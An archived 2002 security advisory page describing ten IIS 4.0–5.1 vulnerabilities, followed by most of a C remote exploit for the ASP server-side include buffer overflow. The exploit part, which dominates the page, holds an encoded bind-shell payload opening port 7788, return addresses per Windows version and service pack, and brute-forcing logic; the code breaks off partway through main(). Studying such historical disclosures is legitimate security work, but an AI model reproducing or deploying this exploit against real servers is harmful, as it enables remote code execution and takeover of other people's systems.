Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: IIS :: web5257.htm

IIS Multiple Buffer Overflow and Cross Site Scripting



11th Apr 2002 [SBWID-5257]
COMMAND

	IIS multiple buffer overflow and cross site scripting

SYSTEMS AFFECTED

	IIS 4.0, 5.0, 5.1, 6.0 All releases and patched version  till  11  April
	2002

PROBLEM

	 Editor\'s note

	 =============

	

	In  this  hudge  advisory  Microsoft  disclose  up   to   10   different
	vulnerabilities affecting all releases  of  IIS,  for  which  a  summary
	table is provided below. At least one of  those  (.htr  remote  overflow
	that could lead to remote access of the server)  was  discovered  by  an
	independant research group [http://www.atstake.com]  in  February  2002,
	undisclosed until today ...
	

	See: [http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-018.asp]

	

	

	Additional note (24 June 2002) : can  you  see  a  similarity  with  bug
	n°2/3 and the recent posts about Apache ??
	

	

	 Summary of vulnerabilities / IIS versions

	 =========================================

	

	 Note : 

	 ====

	IIS 6.0 is not present here, since considered a beta  version  Microsoft
	will not disclose bug details for it. I.e : you should NOT  use  a  .NET
	platform in production environment ...
	

	

								       |IIS IIS IIS|

								       |4.0 5.0 5.1|

	---------------------------------------------------------------+---+---+---|

	Buffer overrun in Chunked Encoding mechanism 		       |Yes Yes No |

								       |	   |

	Microsoft-discovered variant of Chunked Encoding buffer overrun|Yes Yes Yes|

								       |	   |

	Buffer Overrun in HTTP Header handling 			       |Yes Yes Yes|

								       |	   |

	Buffer Overrun in ASP Server-Side Include Function  	       |Yes Yes Yes|

								       |	   |

	Buffer overrun in HTR ISAPI extension 			       |Yes Yes No |

								       |	   |

	Access violation in URL error handling 			       |Yes Yes Yes|

								       |	   |

	Denial of service via FTP status request 		       |Yes Yes Yes|

								       |	   |

	Cross-site Scripting in IIS Help File search 		       |No  Yes Yes|

								       |	   |

	Cross-site Scripting in HTTP Error Page 		       |Yes Yes Yes|

								       |	   |

	Cross-site Scripting in Redirect Response message 	       |Yes Yes Yes|

	

	

	

	 Problem n°1

	 ===========

	

	 Buffer overrun in Chunked Encoding mechanism

	

	A buffer overrun vulnerability involving the operation  of  the  chunked
	encoding transfer mechanism via Active Server Pages in IIS 4.0 and  5.0.
	An attacker who exploited this vulnerability could overrun  heap  memory
	on the system, with the result of either  causing  the  IIS  service  to
	fail or allowing code to be run on the server.
	

	See report by eeye [http://www.eeye.com] in file provided below.
	

	 Update (06 May 2002)

	 ======

	

	The UUencoded archive (reports.zip.uue) below, has been updated with  an
	exploit   to   this   bug   provided   by   CHINANSL    Security    Team
	[http://www.chinansl.com]
	

	

	 Problem n°2

	 ===========

	

	 Microsoft-discovered variant of Chunked Encoding buffer overrun

	

	This one is related to the  preceding  one,  but  which  lies  elsewhere
	within the ASP data transfer mechanism.  It  could  be  exploited  in  a
	similar manner as the preceding vulnerability, and would have  the  same
	scope. However, it affects IIS 4.0, 5.0, and 5.1.
	

	

	 Problem n°3

	 ===========

	

	 Buffer Overrun in HTTP header handling

	

	

	A buffer overrun involving how IIS 4.0, 5.0 and 5.1 process HTTP  header
	information in certain cases. IIS  performs  a  safety  check  prior  to
	parsing the fields in HTTP headers, to ensure  that  expected  delimiter
	fields are present and in reasonable places. However, it is possible  to
	spoof the check, and convince IIS that the delimiters are  present  even
	when they are not. This flaw could enable an attacker to create  an  URL
	whose HTTP header field values would overrun a buffer  used  to  process
	them.
	

	credit goes to entrust [http://www.entrust.com].
	

	

	 Problem n°4

	 ===========

	

	 Buffer Overrun in ASP Server-Side Include Function

	

	

	A Microsoft-discovered buffer overrun vulnerability in IIS 4.0, 5.0  and
	5.1 that results from an error in safety check that is performed  during
	server-side includes. In some cases, a user request for a  web  page  is
	properly processed  by  including  the  file  into  an  ASP  script  and
	processing it. Prior to processing the include request, IIS performs  an
	operation on the user-specified file name, designed to ensure  that  the
	file name is valid and sized appropriately to fit in  a  static  buffer.
	However, in some  cases  it  could  be  possible  to  provide  a  bogus,
	extremely long file name in a way that  would  pass  the  safety  check,
	thereby resulting in a buffer overrun.
	

	 Exploit : (24 June 2002)

	 =========

	

	 

	/* 

	 *   DDK - 2k2 -

	 * 

	 * 

	 *   coded by NeMeS||y tnx to Birdack

	 *  

	 *   

	 */

	

	// IIS 4(NT4) - IIS 5(2K) .asp bof

	

	#include <stdio.h> 

	#include <stdlib.h>

	#include <string.h>

	#include <signal.h>

	#include <sys/types.h>

	#include <sys/socket.h>

	#include <sys/ioctl.h>

	#include <sys/time.h>

	#include <sys/wait.h>

	#include <errno.h>

	#include <unistd.h>

	#include <fcntl.h>

	#include <netinet/in.h>

	#include <limits.h>

	#include <netdb.h>

	#include <arpa/inet.h>

	

	#define RET_BRUTE_START             0x00400000

	#define RET_BRUTE_STOP              0x00500000 

	

	#define PORT_BIND                         7788        

	#define VERSION                         \"0.3b\"

	

	unsigned char wincode[] = 

	\"\\xeb\\x18\\x5f\\x57\\x5e\\x33\\xc9\\xac\\x3a\\xc1\\x74\\x13\\x3c\\x30\\x74\\x05\" 

	\"\\x34\\xaa\\xaa\\xeb\\xf2\\xac\\x2c\\x40\\xeb\\xf6\\xe8\\xe3\\xff\\xff\\xff\\xff\" 

	\"\\x21\\x46\\x30\\x6b\\x46\\xea\\xa3\\xaa\\xaa\\xf9\\xfc\\xfd\\x27\\x17\\x6a\\x30\" 

	\"\\x9c\\x55\\x55\\x13\\xfa\\xa8\\xaa\\xaa\\x12\\x66\\x66\\x66\\x66\\x59\\x30\\x41\" 

	\"\\x6d\\x30\\x6f\\x30\\x46\\x5d\\x55\\x55\\xaa\\xaa\\xaa\\xaa\\x6d\\x30\\x6f\\x9e\" 

	\"\\x5d\\x55\\x55\\xba\\xaa\\xaa\\xaa\\x43\\x48\\xac\\xaa\\xaa\\x30\\x65\\x30\\x6f\" 

	\"\\x30\\x42\\x5d\\x55\\x55\\x27\\x17\\x5e\\x5d\\x55\\x55\\xce\\x30\\x4b\\xaa\\xaa\" 

	\"\\xaa\\xaa\\x23\\xed\\xa2\\xce\\x23\\x97\\xaa\\xaa\\xaa\\xaa\\x6d\\x30\\x6f\\x5e\" 

	\"\\x5d\\x55\\x55\\x55\\x55\\x55\\x55\\x21\\x30\\x6f\\x30\\x42\\x5d\\x55\\x55\\x29\" 

	\"\\x42\\xad\\x23\\x30\\x6f\\x52\\x5d\\x55\\x55\\x6d\\x30\\x6f\\x30\\x4e\\x5d\\x55\" 

	\"\\x55\\xaa\\xaa\\x4a\\xdd\\x42\\xd4\\xac\\xaa\\xaa\\x29\\x17\\x30\\x46\\x5d\\x55\" 

	\"\\x55\\xaa\\xa5\\x30\\x6f\\x77\\xab\\xaa\\xaa\\x21\\x27\\x30\\x4e\\x5d\\x55\\x55\" 

	\"\\x30\\x6b\\x6b\\xaa\\xaa\\xab\\xaa\\x23\\x27\\x30\\x4e\\x5d\\x55\\x55\\x30\\x6b\" 

	\"\\x17\\x30\\x4e\\x5d\\x55\\x55\\xaa\\xaa\\xaa\\xd2\\xdf\\xa0\\x6d\\x30\\x6f\\x30\" 

	\"\\x4e\\x5d\\x55\\x55\\xaa\\xaa\\x5a\\x15\\x21\\x30\\x7f\\x30\\x4e\\x5d\\x55\\x55\" 

	\"\\x99\\x6a\\xcc\\x21\\xa8\\x97\\xe7\\xf0\\xaa\\xaa\\xa5\\x30\\x6f\\x30\\x70\\xab\" 

	\"\\xaa\\xaa\\x21\\x27\\x30\\x4e\\x5d\\x55\\x55\\x21\\xfb\\x96\\x21\\x30\\x6f\\x30\" 

	\"\\x4e\\x5d\\x55\\x55\\x99\\x63\\xcc\\x21\\xa6\\xba\\x30\\x6b\\x53\\xfa\\xef\\xaa\" 

	\"\\xaa\\xa5\\x30\\x6f\\xd3\\xab\\xaa\\xaa\\x21\\x30\\x7f\\x30\\x4e\\x5d\\x55\\x55\" 

	\"\\x21\\xe8\\x96\\x21\\x27\\x30\\x4e\\x5d\\x55\\x55\\x21\\xfe\\xab\\xd2\\xa9\\x30\" 

	\"\\x7f\\x30\\x4e\\x5d\\x55\\x55\\x23\\x30\\x7f\\x30\\x4a\\x5d\\x55\\x55\\x21\\x30\" 

	\"\\x6f\\x30\\x4a\\x5d\\x55\\x55\\x21\\xe2\\xa6\\xa9\\x27\\x30\\x4e\\x5d\\x55\\x55\" 

	\"\\x23\\x27\\x36\\x5d\\x55\\x55\\x21\\x30\\x7f\\x36\\x5d\\x55\\x55\\x30\\x6b\\x90\" 

	\"\\xe1\\xef\\xf8\\xe4\\xa5\\x30\\x6f\\x99\\xab\\xaa\\xaa\\x21\\x30\\x6f\\x36\\x5d\" 

	\"\\x55\\x55\\x30\\x6b\\xd2\\xae\\xef\\xe6\\x99\\x98\\xa5\\x30\\x6f\\x8a\\xab\\xaa\" 

	\"\\xaa\\x21\\x27\\x30\\x4e\\x5d\\x55\\x55\\x23\\x27\\x3e\\x5d\\x55\\x55\\x21\\x30\" 

	\"\\x7f\\x30\\x4a\\x5d\\x55\\x55\\x21\\x30\\x6f\\x30\\x4e\\x5d\\x55\\x55\\xa9\\xe8\" 

	\"\\x8a\\x23\\x30\\x6f\\x36\\x5d\\x55\\x55\\x6d\\x30\\x6f\\x32\\x5d\\x55\\x55\\xaa\" 

	\"\\xaa\\xaa\\xaa\\x41\\xb4\\x21\\x27\\x32\\x5d\\x55\\x55\\x29\\x6b\\xab\\x23\\x27\" 

	\"\\x32\\x5d\\x55\\x55\\x21\\x30\\x7f\\x36\\x5d\\x55\\x55\\x29\\x68\\xae\\x23\\x30\" 

	\"\\x7f\\x36\\x5d\\x55\\x55\\x21\\x30\\x6f\\x30\\x4a\\x5d\\x55\\x55\\x21\\x27\\x32\" 

	\"\\x5d\\x55\\x55\\x91\\xe2\\xb2\\xa5\\x27\\x6a\\xaa\\xaa\\xaa\\x21\\x30\\x7f\\x36\" 

	\"\\x5d\\x55\\x55\\x21\\xa8\\x21\\x27\\x30\\x4e\\x5d\\x55\\x55\\x30\\x6b\\x96\\xab\" 

	\"\\xed\\xcf\\xde\\xfa\\xa5\\x30\\x6f\\x30\\x4a\\xaa\\xaa\\xaa\\x21\\x30\\x7f\\x36\" 

	\"\\x5d\\x55\\x55\\x21\\xa8\\x21\\x27\\x30\\x4e\\x5d\\x55\\x55\\x30\\x6b\\xd6\\xab\" 

	\"\\xae\\xd8\\xc5\\xc9\\xeb\\xa5\\x30\\x6f\\x30\\x6e\\xaa\\xaa\\xaa\\x21\\x30\\x7f\" 

	\"\\x32\\x5d\\x55\\x55\\xa9\\x30\\x7f\\x32\\x5d\\x55\\x55\\xa9\\x30\\x7f\\x30\\x4e\" 

	\"\\x5d\\x55\\x55\\x21\\x30\\x6f\\x30\\x4a\\x5d\\x55\\x55\\x21\\xe2\\x8e\\x99\\x6a\" 

	\"\\xcc\\x21\\xae\\xa0\\x23\\x30\\x6f\\x36\\x5d\\x55\\x55\\x21\\x27\\x30\\x4a\\x5d\" 

	\"\\x55\\x55\\x21\\xfb\\xba\\x21\\x30\\x6f\\x36\\x5d\\x55\\x55\\x27\\xe6\\xba\\x55\" 

	\"\\x23\\x27\\x36\\x5d\\x55\\x55\\x21\\x30\\x7f\\x36\\x5d\\x55\\x55\\xa9\\x30\\x7f\" 

	\"\\x36\\x5d\\x55\\x55\\xa9\\x30\\x7f\\x36\\x5d\\x55\\x55\\xa9\\x30\\x7f\\x36\\x5d\" 

	\"\\x55\\x55\\xa9\\x30\\x7f\\x30\\x4e\\x5d\\x55\\x55\\x21\\x30\\x6f\\x30\\x4a\\x5d\" 

	\"\\x55\\x55\\x21\\xe2\\xb6\\x21\\xbe\\xa0\\x23\\x30\\x7f\\x36\\x5d\\x55\\x55\\x21\" 

	\"\\x30\\x6f\\x36\\x5d\\x55\\x55\\xa9\\x30\\x6f\\x30\\x4e\\x5d\\x55\\x55\\x23\\x30\" 

	\"\\x6f\\x30\\x46\\x5d\\x55\\x55\\x41\\xaf\\x43\\xa7\\x55\\x55\\x55\\x43\\xbc\\x54\" 

	\"\\x55\\x55\\x27\\x17\\x5e\\x5d\\x55\\x55\\x21\\xed\\xa2\\xce\\x30\\x49\\xaa\\xaa\" 

	\"\\xaa\\xaa\\x29\\x17\\x30\\x46\\x5d\\x55\\x55\\xaa\\xdf\\xaf\\x43\\xdf\\xae\\xaa\" 

	\"\\xaa\\x21\\x27\\x30\\x42\\x5d\\x55\\x55\\xcc\\x21\\xbb\\xcc\\x23\\x30\\x7f\\x86\" 

	\"\\x5d\\x55\\x55\\x21\\x30\\x6f\\x30\\x42\\x5d\\x55\\x55\\x29\\x6a\\xa8\\x23\\x30\" 

	\"\\x6f\\x30\\x42\\x5d\\x55\\x55\\x6d\\x30\\x6f\\x36\\x5d\\x55\\x55\\xab\\xaa\\xaa\" 

	\"\\xaa\\x41\\xa5\\x21\\x27\\x36\\x5d\\x55\\x55\\x29\\x6b\\xab\\x23\\x27\\x36\\x5d\" 

	\"\\x55\\x55\\x29\\x17\\x36\\x5d\\x55\\x55\\xbb\\xa5\\x27\\x30\\x7f\\xaa\\xaa\\xaa\" 

	\"\\x29\\x17\\x36\\x5d\\x55\\x55\\xa2\\xdf\\xb4\\x21\\x5e\\x21\\x30\\x7f\\x30\\x42\" 

	\"\\x5d\\x55\\x55\\xf8\\x55\\x30\\x7f\\x1e\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\" 

	\"\\xe9\\xe1\\x23\\x30\\x6f\\x3e\\x5d\\x55\\x55\\x41\\x80\\x21\\x5e\\x21\\x30\\x6f\" 

	\"\\x30\\x42\\x5d\\x55\\x55\\xfa\\x21\\x27\\x3e\\x5d\\x55\\x55\\xfb\\x55\\x30\\x7f\" 

	\"\\x30\\x46\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x21\\x30\\x7f\\x36\" 

	\"\\x5d\\x55\\x55\\x23\\x30\\x6e\\x30\\x7f\\x1a\\x5d\\x55\\x55\\x41\\xa5\\x21\\x30\" 

	\"\\x6f\\x30\\x42\\x5d\\x55\\x55\\x29\\x6a\\xab\\x23\\x30\\x6f\\x30\\x42\\x5d\\x55\" 

	\"\\x55\\x21\\x27\\x30\\x42\\x5d\\x55\\x55\\xa5\\x14\\xbb\\x30\\x6f\\x78\\xdf\\xba\" 

	\"\\x21\\x30\\x6f\\x30\\x42\\x5d\\x55\\x55\\xa5\\x14\\xe2\\xab\\x30\\x6f\\x63\\xde\" 

	\"\\xa8\\x41\\xa8\\x41\\x78\\x21\\x30\\x7f\\x30\\x42\\x5d\\x55\\x55\\x29\\x68\\xab\" 

	\"\\x23\\x30\\x7f\\x30\\x42\\x5d\\x55\\x55\\x43\\xe5\\x55\\x55\\x55\\x21\\x5e\\xc0\" 

	\"\\xac\\xc0\\xab\\xc0\\xa8\\x55\\x30\\x7f\\x7e\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\" 

	\"\\xe1\\xe9\\xe1\\x23\\x30\\x6f\\xe6\\x5d\\x55\\x55\\xcc\\x6d\\x30\\x6f\\x92\\x5d\" 

	\"\\x55\\x55\\xa8\\xaa\\xcc\\x21\\x30\\x6f\\x86\\x5d\\x55\\x55\\xcc\\x23\\x30\\x6f\" 

	\"\\x90\\x5d\\x55\\x55\\x6d\\x30\\x6f\\x96\\x5d\\x55\\x55\\xaa\\xaa\\xaa\\xaa\\x6d\" 

	\"\\x30\\x6f\\x36\\x5d\\x55\\x55\\xab\\xaa\\xaa\\xaa\\x29\\x17\\x36\\x5d\\x55\\x55\" 

	\"\\xaa\\xde\\xf5\\x21\\x5e\\xc0\\xba\\x27\\x27\\x92\\x5d\\x55\\x55\\xfb\\x21\\x30\" 

	\"\\x7f\\xe6\\x5d\\x55\\x55\\xf8\\x55\\x30\\x7f\\x72\\x5d\\x55\\x55\\x91\\x5e\\x3a\" 

	\"\\xe9\\xe1\\xe9\\xe1\\x23\\x30\\x6f\\x36\\x5d\\x55\\x55\\xcc\\x21\\x30\\x6f\\x90\" 

	\"\\x5d\\x55\\x55\\xcc\\xaf\\xaa\\xab\\xcc\\x23\\x30\\x6f\\x90\\x5d\\x55\\x55\\x21\" 

	\"\\x27\\x90\\x5d\\x55\\x55\\x30\\x6b\\x4b\\x55\\x55\\xaa\\xaa\\x30\\x6b\\x53\\xaa\" 

	\"\\xab\\xaa\\xaa\\xd7\\xb8\\xcc\\x21\\x30\\x7f\\x90\\x5d\\x55\\x55\\xcc\\x29\\x68\" 

	\"\\xab\\xcc\\x23\\x30\\x7f\\x90\\x5d\\x55\\x55\\x41\\x32\\x21\\x5e\\xc0\\xa0\\x21\" 

	\"\\x30\\x6f\\xe6\\x5d\\x55\\x55\\xfa\\x55\\x30\\x7f\\x76\\x5d\\x55\\x55\\x91\\x5e\" 

	\"\\x3a\\xe9\\xe1\\xe9\\xe1\\x13\\xab\\xaa\\xaa\\xaa\\x30\\x6f\\x63\\xa5\\x30\\x6e\" 

	\"\\x6c\\xa8\\xaa\\xaa\\x21\\x5e\\x27\\x30\\x7f\\x9e\\x5d\\x55\\x55\\xf8\\x27\\x30\" 

	\"\\x6f\\x92\\x5d\\x55\\x55\\xfa\\x21\\x27\\xe6\\x5d\\x55\\x55\\xfb\\x55\\x30\\x7f\" 

	\"\\x4a\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x23\\x30\\x6f\\xe2\\x5d\" 

	\"\\x55\\x55\\x6d\\x30\\x6f\\xaa\\x5d\\x55\\x55\\xa6\\xaa\\xaa\\xaa\\x6d\\x30\\x6f\" 

	\"\\xae\\x5d\\x55\\x55\\xaa\\xaa\\xaa\\xaa\\x6d\\x30\\x6f\\xa2\\x5d\\x55\\x55\\xab\" 

	\"\\xaa\\xaa\\xaa\\x21\\x5e\\xc0\\xaa\\x27\\x30\\x7f\\xaa\\x5d\\x55\\x55\\xf8\\x27\" 

	\"\\x30\\x6f\\xbe\\x5d\\x55\\x55\\xfa\\x27\\x27\\xb2\\x5d\\x55\\x55\\xfb\\x55\\x30\" 

	\"\\x7f\\x12\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x21\\x5e\\xc0\\xaa\" 

	\"\\x27\\x30\\x7f\\xaa\\x5d\\x55\\x55\\xf8\\x27\\x30\\x6f\\xa6\\x5d\\x55\\x55\\xfa\" 

	\"\\x27\\x27\\xba\\x5d\\x55\\x55\\xfb\\x55\\x30\\x7f\\x12\\x5d\\x55\\x55\\x91\\x5e\" 

	\"\\x3a\\xe9\\xe1\\xe9\\xe1\\x27\\x17\\xfa\\x5d\\x55\\x55\\x99\\x6a\\x13\\xbb\\xaa\" 

	\"\\xaa\\xaa\\x58\\x30\\x41\\x6d\\x30\\x6f\\xd6\\x5d\\x55\\x55\\xab\\xab\\xaa\\xaa\" 

	\"\\xcc\\x6d\\x30\\x6f\\x2a\\x5d\\x55\\x55\\xaa\\xaa\\x21\\x30\\x7f\\xba\\x5d\\x55\" 

	\"\\x55\\x23\\x30\\x7f\\x22\\x5d\\x55\\x55\\x21\\x30\\x6f\\xbe\\x5d\\x55\\x55\\x23\" 

	\"\\x30\\x6f\\x26\\x5d\\x55\\x55\\x21\\x27\\xbe\\x5d\\x55\\x55\\x23\\x27\\x3a\\x5d\" 

	\"\\x55\\x55\\x21\\x5e\\x27\\x30\\x7f\\xb6\\x5d\\x55\\x55\\xf8\\x27\\x30\\x6f\\xfa\" 

	\"\\x5d\\x55\\x55\\xfa\\xc0\\xaa\\xc0\\xaa\\xc0\\xaa\\xc0\\xab\\xc0\\xaa\\xc0\\xaa\" 

	\"\\x21\\x27\\x30\\x42\\x5d\\x55\\x55\\xfb\\xc0\\xaa\\x55\\x30\\x7f\\x16\\x5d\\x55\" 

	\"\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x23\\x30\\x6f\\x36\\x5d\\x55\\x55\\x21\" 

	\"\\x5e\\xc0\\xaa\\xc0\\xaa\\x27\\x30\\x7f\\x9a\\x5d\\x55\\x55\\xf8\\xc2\\xaa\\xae\" 

	\"\\xaa\\xaa\\x27\\x30\\x6f\\xaa\\x52\\x55\\x55\\xfa\\x21\\x27\\xb2\\x5d\\x55\\x55\" 

	\"\\xfb\\x55\\x30\\x7f\\x6e\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x30\" 

	\"\\x50\\xab\\xaa\\xaa\\xaa\\x30\\x6f\\x78\\xa5\\x30\\x6e\\xdf\\xab\\xaa\\xaa\\x21\" 

	\"\\x5e\\xc0\\xaa\\xc0\\xaa\\x27\\x30\\x6f\\x9a\\x5d\\x55\\x55\\xfa\\xc2\\xaa\\xae\" 

	\"\\xaa\\xaa\\x27\\x27\\xaa\\x52\\x55\\x55\\xfb\\x21\\x30\\x7f\\xb2\\x5d\\x55\\x55\" 

	\"\\xf8\\x55\\x30\\x7f\\x6e\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x29\" 

	\"\\x17\\x9a\\x5d\\x55\\x55\\xaa\\xa5\\x24\\x30\\x6e\\xaa\\xaa\\xaa\\x21\\x5e\\xc0\" 

	\"\\xaa\\x27\\x30\\x6f\\x9a\\x5d\\x55\\x55\\xfa\\x21\\x27\\x9a\\x5d\\x55\\x55\\xfb\" 

	\"\\x27\\x30\\x7f\\xaa\\x52\\x55\\x55\\xf8\\x21\\x30\\x6f\\xb2\\x5d\\x55\\x55\\xfa\" 

	\"\\x55\\x30\\x7f\\x62\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x29\\x17\" 

	\"\\x9a\\x5d\\x55\\x55\\xaa\\xd4\\x82\\x21\\x5e\\xc0\\xaa\\x21\\x27\\x9a\\x5d\\x55\" 

	\"\\x55\\xfb\\x27\\x30\\x7f\\xaa\\x52\\x55\\x55\\xf8\\x21\\x30\\x6f\\xe2\\x5d\\x55\" 

	\"\\x55\\xfa\\x55\\x30\\x7f\\x4e\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\" 

	\"\\x41\\x8b\\x21\\x5e\\xc0\\xaa\\xc0\\xa2\\x21\\x27\\x30\\x42\\x5d\\x55\\x55\\xfb\" 

	\"\\x21\\x30\\x7f\\xe2\\x5d\\x55\\x55\\xf8\\x55\\x30\\x7f\\x4e\\x5d\\x55\\x55\\x91\" 

	\"\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x43\\x18\\xaa\\xaa\\xaa\\x21\\x5e\\xc0\\xaa\\xc2\" 

	\"\\xaa\\xae\\xaa\\xaa\\x27\\x30\\x6f\\xaa\\x52\\x55\\x55\\xfa\\x21\\x27\\xe2\\x5d\" 

	\"\\x55\\x55\\xfb\\x55\\x30\\x7f\\x42\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\" 

	\"\\xe1\\x23\\x30\\x6f\\x9a\\x5d\\x55\\x55\\x29\\x17\\x9a\\x5d\\x55\\x55\\xaa\\xd5\" 

	\"\\xf8\\x6d\\x30\\x6f\\x9a\\x5d\\x55\\x55\\xac\\xaa\\xaa\\xaa\\x21\\x5e\\xc0\\xaa\" 

	\"\\x27\\x30\\x7f\\x9a\\x5d\\x55\\x55\\xf8\\x21\\x30\\x6f\\x9a\\x5d\\x55\\x55\\xfa\" 

	\"\\x21\\x27\\x30\\x42\\x5d\\x55\\x55\\x29\\x6b\\xa2\\xfb\\x21\\x30\\x7f\\xa6\\x5d\" 

	\"\\x55\\x55\\xf8\\x55\\x30\\x7f\\x66\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\" 

	\"\\xe1\\x21\\x5e\\x21\\x30\\x6f\\xe2\\x5d\\x55\\x55\\xfa\\x55\\x30\\x7f\\x5a\\x5d\" 

	\"\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x41\\x98\\x21\\x5e\\xc0\\xaa\\x27\" 

	\"\\x27\\x9a\\x5d\\x55\\x55\\xfb\\x21\\x30\\x7f\\x9a\\x5d\\x55\\x55\\xf8\\x27\\x30\" 

	\"\\x6f\\xaa\\x52\\x55\\x55\\xfa\\x21\\x27\\xa6\\x5d\\x55\\x55\\xfb\\x55\\x30\\x7f\" 

	\"\\x66\\x5d\\x55\\x55\\x91\\x5e\\x3a\\xe9\\xe1\\xe9\\xe1\\x43\\xd4\\x54\\x55\\x55\" 

	\"\\x43\\x87\\x57\\x55\\x55\\x41\\x54\\xf2\\xfa\\x21\\x17\\x30\\x42\\x5d\\x55\\x55\" 

	\"\\x23\\xed\\x58\\x69\\x21\\xee\\x8e\\xa6\\xaf\\x12\\xaa\\xaa\\xaa\\x6d\\xaa\\xee\" 

	\"\\x99\\x88\\xbb\\x99\\x6a\\x69\\x41\\x46\\x42\\xb3\\x53\\x55\\x55\\xb4\\xc6\\xe6\" 

	\"\\xc5\\xcb\\xce\\xe6\\xc3\\xc8\\xd8\\xcb\\xd8\\xd3\\xeb\\xaa\\xe9\\xd8\\xcf\\xcb\" 

	\"\\xde\\xcf\\xfa\\xc3\\xda\\xcf\\xaa\\xe9\\xd8\\xcf\\xcb\\xde\\xcf\\xfa\\xd8\\xc5\" 

	\"\\xc9\\xcf\\xd9\\xd9\\xeb\\xaa\\xe9\\xc6\\xc5\\xd9\\xcf\\xe2\\xcb\\xc4\\xce\\xc6\" 

	\"\\xcf\\xaa\\xfa\\xcf\\xcf\\xc1\\xe4\\xcb\\xc7\\xcf\\xce\\xfa\\xc3\\xda\\xcf\\xaa\" 

	\"\\xf8\\xcf\\xcb\\xce\\xec\\xc3\\xc6\\xcf\\xaa\\xfd\\xd8\\xc3\\xde\\xcf\\xec\\xc3\" 

	\"\\xc6\\xcf\\xaa\\xdd\\xd9\\xc5\\xc9\\xc1\\x99\\x98\\x84\\xce\\xc6\\xc6\\xaa\\xd9\" 

	\"\\xc5\\xc9\\xc1\\xcf\\xde\\xaa\\xc8\\xc3\\xc4\\xce\\xaa\\xc6\\xc3\\xd9\\xde\\xcf\" 

	\"\\xc4\\xaa\\xcb\\xc9\\xc9\\xcf\\xda\\xde\\xaa\\xd9\\xcf\\xc4\\xce\\xaa\\xd8\\xcf\" 

	\"\\xc9\\xdc\\xaa\\xc3\\xc5\\xc9\\xde\\xc6\\xd9\\xc5\\xc9\\xc1\\xcf\\xde\\xaa\\xc9\" 

	\"\\xc6\\xc5\\xd9\\xcf\\xd9\\xc5\\xc9\\xc1\\xcf\\xde\\xaa\\xc9\\xc7\\xce\\x84\\xcf\" 

	\"\\xd2\\xcf\\xaa\\xcf\\xd2\\xc3\\xde\\xa7\\xa0\\xaa\"; 

	

	struct{

	      int	       def;

	      char	       *descr;

	      unsigned int ret;

	      unsigned int rewrite;

	      int          port;

	      char         path[256];

	    }target[] = {

	          {0, \" IIS5 Windows 2000 by hsj\", 0x0045C560, 0x77eaf44c, 80, \"/iisstart.asp\"},

	          {1, \" IIS5 Windows 2000 Chinese SP0 - SP1\", 0x0045C560, 0x77ec044c, 80, \"/iisstart.asp\"},

	          {2, \" IIS5 Windows 2000 Chinese SP2\", 0x0045C560, 0x77ebf44c, 80, \"/iisstart.asp\"},

	          {3, \" IIS5 Windows 2000 English SP2\", 0x0045C560, 0x77edf44c, 80, \"/iisstart.asp\"}, 

	          {4, \" IIS4 Windows NT4\", 0, 0, 80, \"/iisstart.asp\"},   

	          {666, NULL, 0, 0, 0, NULL}

	        };

	

	

	int sel = 0;

	int resolve (char *IP);

	int make_connection(char *address,int port);

	int open_back(char *host,int port);

	void l33thax0r(int sock);

	void usage(char *name);

	

	int main(int argc, char **argv)

	 {

	  int i, j, cnt, sock;

	  int brute = 0;

	  unsigned int step;

	  unsigned char		*shell_port_offset;

	  char buf[8192], buf2[16384], host[1024];

	  unsigned int ret_start, ret_stop, ret_step, ret_1;

	

	  fprintf(stderr, \"\\n IIS4(NT4) - IIS5(2K) .asp buffer overflow remote exploit \"

	          \"- DDK Crew 2k2 - (version \"VERSION\")\\n\"

	          \" by NeMeS||y and Birdack\\n\\n\");

	  

	  if(argc == 1) usage(argv[0]);

	 

	  while((cnt = getopt(argc,argv,\"h:t:p:f:b:\")) != EOF)

	    {

	   switch(cnt)

	        {

	   case \'h\':

	     strncpy(host, optarg, sizeof(host));

	     host[sizeof(host) - 1] = \'\\x00\';

	     break;

	   case \'t\':

	     sel = atoi(optarg);

	     break;

	   case \'p\':

	     sscanf(optarg, \"%p\", &target[sel].port);

	     break; 

	   case \'f\':

	     strncpy(target[sel].path, optarg, sizeof(&target[sel].path));

	     target[sel].path[sizeof(&target[sel].path) -1] = \'\\x00\';

	     break;

	   case \'b\':

	     brute = 1;

	     step = atoi(optarg);

	     break;

	   default:

	     usage(argv[0]);

	     break;

	        }

	    }

	 

	 if(target[sel].def == 4) brute = 1; // ;>

	

	 sock = make_connection(host,target[sel].port);

	 if(sock<0)

	    {

	        printf(\"Error -> [ %d ] not connected.\\n\\n\",sock);

	        return -3;

	    }

	 if(brute==0) 

	   {

	     ret_start = target[sel].ret;

	     ret_step  = 1;

	     ret_stop  = target[sel].ret;

	   } else {

	            ret_start = RET_BRUTE_START;

	            ret_step  = step;

	            ret_stop  = RET_BRUTE_STOP;

	          }

	 

	 printf(\"\\n [+] Start\\n\\n  host\\t->\\t%s\\n  port\\t->\\t%d\\n  path\\t->\\t%s\\n  type\\t->\\t%s\\n\\n\\n\",

	        host, target[sel].port, target[sel].path, target[sel].descr);

	 

	 if(brute==1) printf(\"\\n [+] Brute forcing enabled... do u have time?\\n\\n\");

	

